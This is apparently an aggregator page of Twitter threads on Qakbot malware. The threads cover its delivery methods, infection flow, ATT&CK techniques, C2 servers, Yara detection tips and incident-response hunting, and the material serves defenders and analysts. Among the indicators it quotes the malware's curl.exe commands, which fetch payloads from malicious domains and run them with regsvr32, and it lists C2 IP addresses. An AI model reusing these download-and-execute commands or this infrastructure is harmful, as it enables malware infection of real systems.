Discover and read the best of Twitter Threads about #Qakbot

#Qakbot threat actors are on fire 🔥 recently. We observed a high volume of attacks both internally and through external sources. Here is a brief summary of their current attack chain. 🧵1/6
Qakbot's main initial access vector is still through malspam campaigns ✉️. They use email thread hijacking for their spam messages to increase the likelihood that the victim user will interact on the message. 🧵2/6
After a short excursion to OneNote files, both main active #Qakbot botnets have currently returned to using HTML smuggling to deliver the initial attack payload. This technique has already been seen in many campaigns last year. 🧵3/6

#Qakbot once again had some surprises 🎁 for us this week. See below for a brief overview of what we found. 🧡 1/6
First and foremost, #Qakbot seems to have departed from their usual use of LNK files to trigger execution. Instead they now present .vbs or .js files at the root folder of the disk image 💿. 🧵 2/6
This alone would not be significant, since we have observed 🔍 .js and .vbs files in Qakbot's infection chain before. Now however these files also contain a signature that apparently bypasses Windows MotW / SmartScreen warnings. 🧵 3/6

#Qakbot Infection New TTPs 🚨

[+] Deliver ISO (T1204.002)
[+] DLL Search Order Hijacking (T1574.001) 🔥
[+] Regsvr32 (T1218.010)
[+] Process Hollowing (T1055.012)
[+] Discovery (TA0007)
[+] Credentials from Web Browsers (T1555.003)
[+] Data from Local System (T1005)
#Qakbot C2 server:
IP: 92.27.86[.]48
Port: 2222

Additional C2 IP:
23.111.114[.]52
#Qakbot initial exec flow #DFIR:
ISO > LNK > cmd.exe /c control.exe > e:\control.exe > regsvr32.exe msoffice32.dll > Injection

#Qakbot New TTPs IMG File Infection

[+] IMG File instead of ISO 🔥
[+] VBS Script (ShellExecute) instead of LNK 🔥
[+] .tmp (DLL loader) exec via Regsvr32.exe
[+] Process Injection
[+] Discovery commands
[+] C2 connection

#DFIR exec flow: img > vbs > tmp > injection
Thank you @pr0xylife for sharing the sample:

bazaar.abuse.ch/sample/ac7c130…
#Qakbot C2 server:

IP: 70.121.198[.]103
Port: 2078
Artifact: POST /t5 HTTP/1.1

Additional C2 IPs:

🐲 Ghidra Tips 🐲- Malware Encryption and Hashing functions often produce byte sequences that are great for #Yara rules.

Using #Ghidra and a Text Editor - You can quickly develop Yara rules to detect common malware families.
(Demonstrated with #Qakbot)

[1/20]
#Malware #RE
[2/20]
Hashing and encryption functions make good targets for #detection as they are reasonably unique to each malware family and often contain lengthy and specific byte sequences due to the mathematical operations involved.

These characteristics make for good Yara rules 😁
[3/20] The biggest challenge is locating the functions responsible for hashing and encryption. I'll leave that for another thread, but for now...

You can typically recognize hashing/encryption through the use of bitwise operators inside a loop. (xor ^ and shift >> etc).

#Qakbot Dumpulator Script has now been added to Github! 😀

This script is capable of dumping decrypted strings from the encrypted string table used by recent Qakbot malware.

1/ (notes and details below)
#malware #qakbot #dumpulator #RE
2/ The script *should* work on the samples that I have provided in the readme, however you may need to change some register values to get it to work on different samples.

In particular, "dp.regs.ecx" and "dp.regs.esp+0x4" may need to be changed. As these ...
3/ cont'd... as these values point to the encrypted string table and key, which will differ between samples. You can re-use the same dump file if you wish, as the code will likely remain the same.

#Qakbot - AA - url > .zip > .lnk > .dll

MD %HOMEPATH%\XL\zAkOR

curl.exe --output %HOMEPATH%\XL\zAkOR\vE0oHQ.KtIB.q_qw https://fratelliperu.]com/aYMst/A.png

regsvr32 "%HOMEPATH%\XL\zAkOR\vE0oHQ.KtIB.q_qw

bazaar.abuse.ch/sample/617c94a…

IOC
github.com/pr0xylife/Qakb…
++

MD "%HOMEPATH%\qI\ZXOjp

curl.exe --output %HOMEPATH%\qI\ZXOjp\DSVa.BVLl.ae https://arboldeaventuras.]com/uAY4Y/C.png

regsvr32 %HOMEPATH%\qI\ZXOjp\https://t.co/G7DaSz06RB

bazaar.abuse.ch/sample/ba7b459…

bazaar.abuse.ch/sample/500f852…

1/ Visibility is key for eradication 🥷

In a recent IR case, the TA created persistences with #QakBot on almost every system in the network.

If only individual systems in the network were forensically examined, one or more infected systems would undoubtedly be missed.

🧡
2/ By examining the network connections made by the clients & servers with a forensic agent, it is apparent that QakBot has made a process injection into the following two processes:

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\mobsync.exe
3/ The analysis of the network connections gives us active C2 addresses that we can use for additional hunting inside the network (and in the FW logs).

ICYMI, @PwC_UK’s 2020 #threatintel Year in Retrospect report is out now! All team contributed but h/t to @KystleM_Reid! :fire: You can check it out here: pwc.to/2ZPx7fo In this thread, I will summarise some of what I thought were key findings: 🧵👇 1/n
#Ransomware has become the most significant cyber security threat faced by organisations, irrespective of industry/location. TTPs have pivoted to mass data exfiltration prior to encryption, along with leaks & extortion. S/o to @andyp346 for all your work countering this. 🙏 2/n
In 2020, 86% of the incidents that PwC’s Incident Response team responded to were attributable to cyber criminals. 79% of leaks happened in 2nd half of 2020. Our data sees Manufacturing, TMT, & Professional Services most impacted. 3/n